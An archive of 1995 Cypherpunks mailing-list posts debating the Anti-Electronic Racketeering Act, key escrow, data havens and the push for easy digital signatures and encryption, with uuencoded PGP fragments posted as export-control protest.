Article Requests to    flashback@FlashBack.COM 
Article Submissions to flash@FlashBack.COM 

For more information send email to flashback@FlashBack.COM with article
names or numbers in the Subject line:
	9001       - general introduction 
	index      - for an index of the most recent 150 articles
	fullindex  - for an index of 800+ articles
	popular    - for a summary of the popular article for each month
	73.00 1176 - For the January  1995 Table of Contents 
	74.00	   - For the February 1995 Table of Contents
	75.00 1221 - For the March    1995 Table of Contents
	76.00 1262 - For the April    1995 Table of Contents
	77.00 1286 - For the May      1995 Table of Contents
	78.00 1344 - For the June     1995 Table of Contents
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 13 Jul 95 17:01:03 PDT
To: ylo@cs.hut.fi
Subject: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <199507132215.BAA17628@shadows.cs.hut.fi>
Message-ID: <199507132356.AA13388@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 14 Jul 1995 01:15:04 +0300
   From: Tatu Ylonen <ylo@cs.hut.fi>
   to break encryption for anyone.  Plus, it was created and is primarily
   distributed *outside* the United States, in a country where none of
   the algorithms are patented.  It can thus be openly available for

Well, I think it's nice that people outside the U.S. will have access
to encryption; it appears, however, that those of us in the U.S. writing
such software may end up having to forego payment and credit, until
Blacknet is very strong...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 16:01:40 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507132259.SAA03339@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net>,
jfmesq@ibm.net (James F. Marshall) wrote:

> I haven't read the whole
>bill, but I read the "regardless" phrase with a different emphasis. 
>In short, that language appears to mean that one could be pounded with
>RICO for uploading crypto software even if the crypto is EXPORTABLE.

The government doesn't want us to use any crypto that takes them an
appreciable ammount of time to crack. It seems inevitable to me that such
crypto will soon be outlawed. The same goes for anonymous remailers. It is
only a matter of (very little) time. Yes, Black Unicorn is right. We need
stealth encryption. Unfortunately even that won't help as much as one
might think, because it can only be used by tight conspirators who are
willing the to take the risk to be locked up in a concentration camp, I
mean jail, for the rest of their lives. Crypto for the masses is about to
fade away into history, before it ever really caught on.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAWlEyoZzwIn1bdtAQFIYwF+JKboVVw7qm+Ejyj0ecTp1EbqWL2YCAlb
tL3RLDWA5VLcKakMh2nI3oZns0SLknGw
=+fvE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 16:50:58 PDT
To: cypherpunks@toad.com
Subject: Re: mistake on my part
Message-ID: <199507132348.TAA03865@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9507131759.AA12314@webster.imsi.com>, perry@imsi.com (Perry E.
Metzger) wrote:

>I made a small mistake -- the new bill does *not* make it a crime to
>make crypto software available at Egghead -- but it does more or less
>make distribution of crypto software over the internet impossible if
>it isn't an escrow based system.

And once that happens, you will have to fill out a form and register your
copy of crypto software that you got at Egghead, just as you have to
register firearms today.

<I am starting to wish I had bought an AR-15 back when you still could>

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAWwryoZzwIn1bdtAQG9nAF/WVEXYjXk8fmPHtgn0pxfMTMBLCjAEvM0
+XKCLWWTaQ/5jy3cvFco8FILAb48RuYz
=+LO3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 13 Jul 95 11:50:59 PDT
To: perry@imsi.com (Perry E. Metzger)
Subject: mistake on my part
Message-ID: <22250.9507131850@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger <perry@imsi.com> writes on cpunks:
> I made a small mistake -- the new bill does *not* make it a crime to
> make crypto software available at Egghead -- but it does more or
> less make distribution of crypto software over the internet
> impossible if it isn't an escrow based system.

I thought there was some kind of "read my lips" type statement about
not mandating key escrow a short while ago.  Making it illegal to not
use escrow on the internet (in the US and certain materials) sounds
dangerously close to mandating key escrow.

Also I remember one list member making a prediction, that as they'd
said _definately no key escrow_, that you could bet your ass that
meant exactly the opposite, and that it would rear it's head anytime
soon.  I think the poster even had a prediction in terms of months,
but don't have the original post handy, looks like he was right.

Anyway these things are in stages:

1. voluntary key escrow
2. mandatory key escrow for certain materials
3. mandatory key escrow across the board

If they pull this off stage 2, I wonder how long till stage 3, I think
it'll be time to leave the sinking ship while exit visas are still
granted!

Adam
--
------------------ PGP.ZIP Part [025/713] -------------------
M83PL=@FR8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F
MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/
MC@FR+[`#J_`.6J`QW&"'YPZ4A[,XC10,0@\T1R.H\52,%3N1CI\TY('#M1)D
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 16:54:39 PDT
To: cypherpunks@toad.com
Subject: Re: mistake on my part
Message-ID: <199507132352.TAA03917@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article
<Pine.ULT.3.91.950713143343.10146B-100000@krypton.mankato.msus.edu>,
hayden@krypton.mankato.msus.edu ("Robert A. Hayden") wrote:

>On Thu, 13 Jul 1995 aba@dcs.exeter.ac.uk wrote:
>
>> If they pull this off stage 2, I wonder how long till stage 3, I think
>> it'll be time to leave the sinking ship while exit visas are still
>> granted!
>
>And go where?  I know i'm living in a shell, but I've never heard a 
>difinitive answer of where is a better place to live and still has the 
>same or better freedoms.
>
>*serious question*

There is none. At least not for the average citizen with an avarage
income. This is the best you will find. Everywhere else it is already
worse than here and getting worse as well. Perhaps nanotech will have a
breakthrough and allow colonization of outer space. There sure is nothing
on this planet. Sorry.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAWxbioZzwIn1bdtAQE1GwF+PshiXqSvW6H3hpGks8Z+6PqdR2wEeWbC
1TUfjgzcGKVl3vFc1SZWTr2VitCPJb0q
=1xuY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 17:07:57 PDT
To: cypherpunks@toad.com
Subject: Re: The end of public key cryptography as we know it?
Message-ID: <199507140005.UAA04037@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507132009.AA15283@tyrell.net>, pgf@tyrell.net (Phil
Fraering       ) wrote:

>   From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
>   Date: Thu, 13 Jul 1995 13:46:10 -0500
>
>   An article posted on sci.crypt stated that quantum factoring
>   is real and that an article was posted in this month's Science
>   magazine. The author of the post says this would make factoring
>   a 10 bit number the same time as factoring a 100000000 bit number.
>
>You can bet your ass and your mother's and grandmother's donatable
>organs that if this were possible, then the legislative initiatives
>currently underway would not be: they'd just let us use RSA and get
>a false sense of security.

Even with a quantum computer, factoring is still an extra step that is not
required with GAK. Besides, factoring will always be more expensive than
GAK, at least for the other side.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAW0VSoZzwIn1bdtAQG9QQF+OWci7VK8X9/ropNlf5dGW5/jbHWo+4cR
2GvuYpDvoAbDRQmDcpFR7u8hBog7KIet
=c/wa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 18:10:17 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Expansion on my earlier rant (long)
Message-ID: <Pine.ULT.3.91.950713200640.19067A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi all, me again.

I've received about a dozen requests to clarify my rant earlier about 
what I think needs to be done about the future of the CPs and the net, 
now that the official declaration of war has been made by the government. 
So, I'm going to do that.  

As a quick warning, however, I need to remind everyone that I am not a 
programmer.  My knowledge of Internet protocols is passable, but actual 
implementation issues are beyond me.  Basically, I'm a well-informed user 
with dreams.  Professionally, I'm a teacher and a graduate student in the 
area of Education Technology (use of modern technologies as applied to 
education) at Mankato State University in Minnesota.  I also write geek 
codes and am active politically serving on the college senate and being 
outspoken in other areas. :-)

Anyways . . . 

- -------------

When I look at the current political climate, the current technologies, 
and the predications for the next two or three years of the expected 
changes in the social makeup to the Internet, I quickly realize that the 
Cypherpunks cannot possibly, except by pure luck, expect to influence any 
change of the net.  The problem isn't that it is growing too fast.  The 
problem is that we as a generation of network users, who first came 
online circa 85-92, are not the same generation that make up the bulk of 
the population.

The bulk of the population, and the one that is continuing to come 
online, don't CARE about technical issues.  All they care about is what 
the net can do for them as a COMMUNICATION TOOL.  And until WE stop 
getting bogged in technical issues and start looking at this from the 
user's end of the spectrum, not enough people are going to care for it to 
matter. 

So when you take a program like PGP, which by all definitions is a
technological godsend, and introduce it to the mass populations of the
net, you get a big "Buh!?" back from them.  Why?  Because they just don't
care.  Furthermore, it becomes difficult to to teach them about the values
of the program because PGP is far too difficult to use.  I'm not saying
that the majority of the net is stupid, just that they don't want things
to be any more complicated than necessary. 

Thus, if we want to institute change, we have to come at it from a 
different angle.  We have to take into consideration the sociological 
makeup of the net, and, more importantly, what the current and future 
populations of the net are going to WANT.  Serving the needs of a tiny
percentage of people isn't going to accomplish what we want.

- -------
WHAT SHOULD WE DO

Now, if I was the king, this is what I'd like to see done...

1)	RE-EVALUATE PUSHING PGP
There is little doubt that PGP is a great program.  It does everything we 
want it to do.  Unfortunately, there are some significant problems with 
it as well.
	A)  ITAR:  'nuff said.  This prevents it's global use.
	B)  Patent concerns.  I don't know fully the details of this, but 
		if I understand, there are some concerns about who owns 
		what portions of the encryption algorithms, or something to
		that effect.
	C)  Can PGP's features be implemented in style usable by the
		current generation of Internet users?

The problem is that while we fight solving all of these concerns, we are 
going nowhere.  Would it be, in terms of time required, better to come 
up with another system that solves these problems?  By using 
international encryption techniques and Public Domain algorithms, and 
design the program specifically for implementation in user-end and 
server-end programs?

I don't know.  But this is what the re-evaluation needs to answer.

2)	PUSH FOR UNIVERSAL DIGITAL SIGNATURES
In my version of utopia, all digital messages are signed.  Unfortunately, 
right now, there are no mechanisms in place to achieve that.  

	First, a way to get signatures out needs to be done.  A
	server<->client program similar to Archie needs to be developed
	that will allow people to retrieve signatures off of some registry
	site(s).  Of course, this should be done with encryption, probably
	something similar to what netscape uses for its data transfers.  I
	should be able to get any person's digital signature knowing
	nothing more than their email address, or less specific, their
	name.  This is a white pages of the net. 

	Second.  A mechanism needs to be devised where all email and
	usenet material is digitally signed.  This needs to be done in a
	way that the user is not even aware that it is being done.  Perhaps
	an encrypted environment variable containing the key would work
	(ie, you run a program, type in your passphrase, it encrypts it to 
	a file, assigns your signature, and then reads that file into the
	environment, decrypting it when needed.  It does this once during 
	generation.).  In any case, no user should have to manually sign 
	anything.  Optimally, signatures would be part of the header of the 
	message, and not even seen by users. It's not 100% safe, especially
	on a multi-user system, but it's a helluva start. 

	Third, automated checking, via news readers or mail readers needs
	to be implemented.  All it needs to do is when a message arrives,
	it first greps the users personal keyring.  If the matching
	signature isn't found, it checks the system keyring.  If not
	found, it uses a similar protocol as above to check the Global
	Keyring (using an encrypted session).  If the signature is found to
	be authentic, it marks it as such, if not, it warns the user and
	it is unreliable data.  This optimly would take place prior to
	delivery by the mail transfer agent or news transfer agent of the
	receiving computer. 

No matter what, digital signatures need to be pushed as being unrelated 
to cryptography.  While they are similar, their are political problems 
with encryption, but not really with signatures.  If we make a hearty 
push towards authenticated communications, encryption falls right in line 
as a (oh, by the way, we can also...)

3)	NEAR TRANSPARENT ENCRYPTION

In the end, the goal is that encryption becomes simple enough and 
unintrusive enough that everybody will use it.  Once again, however, we 
need public key servers that can dole out keys on request.  Furthermore, 
encryption needs to be as simple as clicking on a button when you mail 
it, with the mail program or transfer agent doing the appropriate 
scrambling based on the addressee.  It needs to be able to get keys from 
servers in the background and decrypt without any more manual interaction 
than typing in a passphrase.  It is also my belief that digital 
signatures and encryption SHOULD NOT utilize the same key in a fully 
automated system, or have different passphrases within the same key.

4)	AND IT'S ALL GOTTA SIMPLE
Finally, I need to reiterate this.  Whatever is implemented has to be 
ungodly simple to use.  Users shouldn't have to think about this stuff.  
Administrators shouldn't have to deal with user requests about this stuff 
(just install the programs and go to it).  It's all gotta be free, AND 
internationally legal.  If we fail any of these tests, we can't win.

5)	JOIN THE EFF
Well, I just thought I'd throw this in, it can't hurt :-)

- ----------------------

Anyway, that's what I see as needing to be done.  All of this ISN'T just
about writing code, however.  All of us, myself included, need to start
electronically signing everything we send, especially to mailing lists and
as much as you can to usenet.  If anything, it's gets the word out as a
USEFUL implementation of this technology (verification of message).  We
need to not be afraid to send a letter to our elected officals warning
them about what the laws they are passing are going to do.  That's the
easy part.  The hard part is staying at it long enough to win the war. 

[as a side note, does anybody have a script or program that will 
auto-sign a message?  I'm usuing mkpgp for pine right now as an alternate 
editor, but that does more than I need (encryption and such.]



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAXEAjokqlyVGmCFAQH5aAP+Lbw37+//V6Blm29DCLbzkHgZ2u2pOU1c
mzqpBBwfA2cggdYPZj6a/wJAmWr06aMiCV02MFJF90NW3BdwVDogCrc67+iHY5UM
fc3AVXzFvM39KG6Ruizo3Wf6tXSpWUxvrgCiWODR4SiwyvpEvFbSJ+IsawUSLpfe
BZKAFv8bi50=
=zmoa
-----END PGP SIGNATURE-----


____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 13 Jul 95 17:35:40 PDT
To: cypherpunks@toad.com
Subject: Crypto '95 roommate?
Message-ID: <199507140035.UAA23513@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anyone looking for a roommate for crypto '95?  If so, let me know.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: unicorn@polaris.mindport.net (Black Unicorn)
Date: Thu, 13 Jul 95 20:03:20 PDT
To: perry@imsi.com
Subject: Re: Fight, or Roll Over?
Message-ID: <v02130500ac2ce4f7153e@[205.219.167.38]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 9:55 PM 7/13/95, Perry E. Metzger wrote:
>"Robert A. Hayden" writes:
>> On Thu, 13 Jul 1995, Douglas Barnes wrote:
>>
>> > Since the Anti-Electronic Racketeering Act of 1995 might as well
>> > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>> > Tim throw in the towel already, when the bill hasn't even made it
>> > through committee yet.
>>
>> I don't think Tim threw in the towell on this bill, but has come to
>> realize that the overall war on privacy cannot be won by concentrating on
>> the individual battles.
>
>Thats true. However, I think that one strategic move would be to get a
>PR firm involved that is capable of severly embarassing any politico
>who puts his name any of these proposals. After two or three of those
>they start getting gunshy.
>
>Folks, this isn't trivial. It isn't an easy thing to do by any
>means. However, it is far from impossible.
>

[...]

>
>Anyone who is saying that it is impossible to fight the legislative
>battles hasn't been thinking. It takes millions of dollars,  but there
>is a lot of money out there to be had in my opinion.

Perry and I discussed this a bit today.  I have a call into a friend of mine
at one of the larger firms in D.C., who I will neglect to name until I hear
back.  I have a feeling there are a pile of funds to be had, and I'm going to
try to work with Perry to get the people who should be interested,
interested.


>
>Perry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMAc23y1onm9OaF05AQGbvwf+OrqSIlELmS4bDSMqkPU3WKoqH2GGG+/p
ki4l4AW2mM9FUEwfSUErFibnXqik+6zRjkOsKPDEpbmbOc9HM/OnEO0v8MTM6nQZ
1QT6mFcR9rpF8v+ZNlN35davf9VLcsMX0avjWZmNJbtQHEG3wL1Vt1BhCBaJjA/b
XkrNMAI5gbIp0ervus5WGcGEajGr2BhGU9EOpA0eLRs/eoCg4W2rVSuTxGXZ9XhL
2nLdBor/XJENRrTmW38sya8x5vuDKwOLMMCTVgsg2QxzbGIk1jE2JjYmi2tqmISf
V69UVKfvEsqhq9uKUksJG8tmoiyFs4b0Ctra/n/AibxYYKcCK5Qb3g==
=/c9H
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Thu, 13 Jul 95 18:44:26 PDT
To: cypherpunks@toad.com
Subject: Root Causes
Message-ID: <199507140151.UAA01504@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

While I respect the ideas and opinions submitted by the majority of the
members of this list, I wonder if perhaps we're failing to deal with the
_root_ problem of such things as the CDA, Clipper, DTA, etc.

Specifically, I wonder if it wouldn't be a better approach to *prevent* such
measures from ever being proposed in the first place.

(pause to adjust nomex undies and titanium body armor :-)

Is there any precedence or possibility of either filing civil or criminal
charges against a Government official for their _official_ actions?
Something that will not only make for some Serious Press, but hit them from
an unexpected angle?

(close hatch on bunker :-)

It would seem that things such as the CDA, etc, are patent violations of the
Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
measures be violating our civil rights, and thus be criminally liable?
Aren't Congressrodents supposed to take an Oath of Office that involves
upholding the Constitution?

Alternatively, could a civil suit be filed for invasion of privacy or
somesuch? Or perhaps the previously mentioned violation of civil rights (a
la Rodney King)?

How many laws, etc, can we invoke? I mean, most congresscritters don't craft
laws on their own, so the involvement of their staff would constitute
conspiracy, as well, wouldn't it?

I'd think that if a few of the <insert favorite expletive here> were sued
and/or tried, it would sure make the rest of them consider the full
implications of any laws they might consider proposing. Too, it might
accidentally ripple through all of the Government, and settle down some of
the beaurocrats that aren't subject to voters.

IANAL, of course, so I'll leave it up to those on the list who are to
express more informed opinions; still, it _seems_ like a possible course of
action.....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAWqT8VrTvyYOzAZAQFPiwQAluzkD3H+AcUFr7qNhf84I7Y3FNB27Lxc
jQQ5UQnYgvQpHhlExJGmxDjebbOgbOik5Xu2KoQYbdutc/LBWHN6OzfLWim9jWwq
C1nKEnDUo1jKQ+LcsV0/TGrwKPUYVnOhswZPydn50xnKF3KuW17RnXFeYJi+DTdZ
D3YtxRa2shc=
=JiVo
-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Thu, 13 Jul 95 17:55:30 PDT
To: cypherpunks@toad.com
Subject: Re: OTP server..
In-Reply-To: <v02130500ac2cc7c4390a@[205.219.167.38]>
Message-ID: <199507140053.UAA13342@janet.advsys.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com (Le Dieu D'Informations Insensibles...)
Date: Thu, 13 Jul 95 20:54:51 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507140351.UAA23945@ccnet.ccnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>On Thu, 13 Jul 1995, Ray Arachelian wrote:

>How about "not respecting international copyright law, and not having 
>extradition treaties with the US" ... set up a data haven, we now know 
>why we need it soon... charge by the Kbyte, automate the billing, and relax.
        How about one of the Middle Eastern countries? Saudi Arabia would have
been good until recently, but they've just signed the Berne Convention on
copyrights...so there's one down. On the plus side, the authorities haven't
banned crypto yet. Why? One only wonders.
        Kuwait has ready-made Internet access, but is, if I'm not mistaken,
also a signatory to the international copyright convention. Both Kuwait and
the KSA are also very friendly with the U.S., though I cannot name any
specific case of extradition between the two countries. Given the choice
between a Saudi court and a U.S. one, however, I'd pick the U.S. :-)
        Why not Yemen, Oman, or Lebanon? We'd have to start an ISP by
ourselves, but the countries are small enough...or just recovering from civil
war...such that nothing would be noticed(fingers crossed). Oman has CISnet
access...maybe something could be built on that. For Yemen or Lebanon, we'd
have to get a satellite hookup(which presents its own problems).
        Besides, Oman has simply _beautiful_ scenery. :-)        
>Anybody seriously interested? 
        In theory. To actually set up a data haven takes more resources than I
have. IMHO, however, one of the smaller Middle Eastern countries would be
good, as they generally don't(unless I'm mistaken) have reciprocal copyright
treaties with the U.S., are not generally signatories of the Berne Convention
(except KSA and the UAE and maybe Kuwait), and do not look likely to outlaw
crypto. 

Thoughts?

David Molnar

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMAVbweFDHpuTkgoVAQHt8Af/VkW5FIqpd46ydnchTpSfKZUS+c4Aviu6
ZQA2UYY5GbCQhyKNJ6Tk2OKJI82vfOpo+n+uSZfvAWnLlxrzQ1mDJxJ9wWaaAa4u
WIG4XWbGCFetRYAVYF+h/I6zG7+zCE8N3bn2kAcAz7SoDgqGP1CXiXsXmEiqBJNS
O8U8nM1ZFZ4KZBwShf5SsprKgKP98TCmWJc7L5li9Pco7HyLzBdsHUz2pJgCd4Eh
rp/8jfzu2so/tF5EHkjGIcPUnp0rEfZ5gKc/gimDloHfyzVxA3ITraXe8xOZF3iX
sICCpBb+qoDLzvt5lM+Vpm7+pUa/fF+OJB0+eX4gNw/a082gH6LeOg==
=rmDi
-----END PGP SIGNATURE-----

lo...look to the sig, for there will be no sign






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 13 Jul 95 18:56:00 PDT
To: jya@pipeline.com
Subject: Re: co-sponsors S.974
Message-ID: <199507140155.UAA00007@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>I searched Thomas and couldn't find any evidence of 
>co-sponsors to the  Senate bill. Am I wrong here?
[...]
>Anyone got better info on yes/no sponsors or seen the DOJ press
>release?

There are 2 bills.  Senator Grassley's repressive Anti-Electronic Racketeering
Act of 1995 (S.974) has no co-sponsors.  

Senators Leahy, Kyle, and Grassley co-sponsored the National Information
Infrastructure Protection Act of 1995 (S.982).  I haven't seen any analysis
of it, but I did a quick read of it and didn't see anything alarming.


                          | Putt's Law:
Frank Stuart              | Technology is dominated by two types of people:
fstuart@vetmed.auburn.edu | Those who understand what they do not manage.
stuarfc@mail.auburn.edu   | Those who manage what they do not understand.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 18:00:55 PDT
To: cypherpunks@toad.com
Subject: co-sponsors S.974
Message-ID: <199507140100.VAA00681@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@imsi.com (Perry E. Metzger) on Thu, 
13 Jul  4:51 PM

>I searched Thomas and couldn't find any evidence of 
>co-sponsors to the  Senate bill. Am I wrong here?


As you know, gnu@toad.com sent the EFF analysis which included:

   > From: ssteele@eff.org (Shari Steele)
   > ...
   > Fortunately, the bill does not have a very promising
   > future.  The bill has  no co-sponsors.  It was immediately
   > referred to the Committee on the Judiciary, where it
   > currently sits.  LEXIS's bill tracking report only  gives
   > it a 10% chance of passing out of the committee. ...


In contrast, the following is from law list Cyberia-L today:


   > At  8:17 AM 7/13/95 -0400, James R. Coleman wrote:

   >> Anyone know the committee status of this bill.  Does it
   >> have co-sponsors?  House sponsors?  Are hearings
   >> scheduled?  Or is Grassly not serious but tryint to get
   >> some press in Des Moines?

   > The bill was co-sponsored by Sens. Kyl (R-AZ) and Leahy
   > (D-VT). It has the enthousiastic support of the
   > administration. In a DOJ press release  following its
   > introduction, AG Reno is quoted as saying "computer crime
   > is fast becoming everyone's problem. I'm encouraged that
   > this bill is off to a  bipartisan start, and I hope
   > Congress will move quickly to enact it." 
   >
   > If there's a companion bill in the House, I'm not aware of
   > it.
   >
   > John Noble


Anyone got better info on yes/no sponsors or seen the DOJ press
release?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 19:00:08 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <9507140155.AA13373@snark.imsi.com>
Message-ID: <Pine.ULT.3.91.950713205857.19725A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> Anyone who is saying that it is impossible to fight the legislative
> battles hasn't been thinking. It takes millions of dollars,  but there
> is a lot of money out there to be had in my opinion.

Nobody's saying it's impossible, what we're saying is that we don't have 
the resources to DO that on the scale that is needed.  Maybe Microsoft 
does, but we don't.  What we can do, however, is to shape the culture of 
the net.  That culture will have to eventually be listened to by DC.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 19:15:35 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Root Causes
In-Reply-To: <199507140151.UAA01504@arnet.arn.net>
Message-ID: <Pine.ULT.3.91.950713211304.19919A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


If I understand, you can't sue the governemtn for just trying to pass a 
law, or for even passing it.  What has to happen is that somebody needs 
to be arrested and charged with breaking the law before you can challenge 
them.

Although publishing an "Enemies of the Constitution" list all over the 
net, listing which congress-critters opposed the constitution (suck as 
Exon) might be interesting.  Might even make a good web project.  *ponders*

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Thu, 13 Jul 95 21:30:36 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <Pine.SUN.3.91.950713212826.13152A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


What time is the Five minute hate?


Amerika: land of the Freeh, home of the slave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Thu, 13 Jul 95 15:26:09 PDT
To: cypherpunks@toad.com
Subject: LD tentacle?
Message-ID: <9507132146.AA04231@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


has anyone heard of John Bass? based on this recent message, in which he
melodramatically tries to stir the shit on a RMIUG list (rocky mountain 
internet user group) I wonder if L.D. is in fact a John Bass tentacle, or
vice versa...


